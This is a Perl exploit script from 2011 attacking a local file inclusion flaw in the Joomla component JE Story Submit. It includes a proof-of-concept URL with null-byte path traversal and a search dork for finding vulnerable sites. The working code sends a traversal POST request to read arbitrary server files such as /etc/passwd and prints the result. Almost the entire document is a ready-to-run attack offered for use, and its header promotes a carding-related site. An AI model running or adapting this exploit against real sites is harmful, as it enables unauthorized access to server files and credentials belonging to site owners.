#! /usr/bin/perl -w # Joomla Component JE Story Submit Local File Inclusion Vulnerability # Author : v3n0m # Date : July, 21-2011 GMT +7:00 Jakarta, Indonesia # Software : JE Story Submit # Vendor : http://joomlaextensions.co.in/ # License : GPLv2 or later # Tested On: Joomla 1.5.x # irc.yogyacarderlink.web.id - www.yogyacarderlink.web.id # # PoC - http://127.0.0.1/[path]/index.php?option=com_jesubmit&view=[LFI]%00 # use LWP::UserAgent; use HTTP::Request::Common; my ($host, $file) = @ARGV ; sub clear{ system(($^O eq 'MSWin32') ? 'cls' : 'clear'); } clear(); print "|==========================================================|\n"; print "| 'Joomla Component JE Story Submit Local File Inclusion' |\n"; print "| Coded by : v3n0m |\n"; print "| Dork : inurl:com_jesubmit |\n"; print "| |\n"; print "| www.yogyacarderlink.web.id |\n"; print "| |\n"; print "|===================================[ YOGYACARDERLINK ]====|\n"; print "\nUsage: perl $0 \n"; print "\tex: perl $0 http://www.site.com /etc/passwd\n\n"; $host = 'http://'.$host if ($host !~ /^http:/); $host .= "/" if ($host !~ /\/\$/); my $ua = LWP::UserAgent->new(); $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1"); $ua->timeout(10); my $request = HTTP::Request->new(); my $response; my $url = $host."index.php?"; my $req = HTTP::Request->new(POST => $host."index.php?"); $req->content_type('application/x-www-form-urlencoded'); $req->content("option=com_jesubmit&view=".("/.."x10).$file."%00"); $request = $ua->request($req); $result = $request->content; $result =~ s/<[^>]*>//g; print $result . "\n"; exit;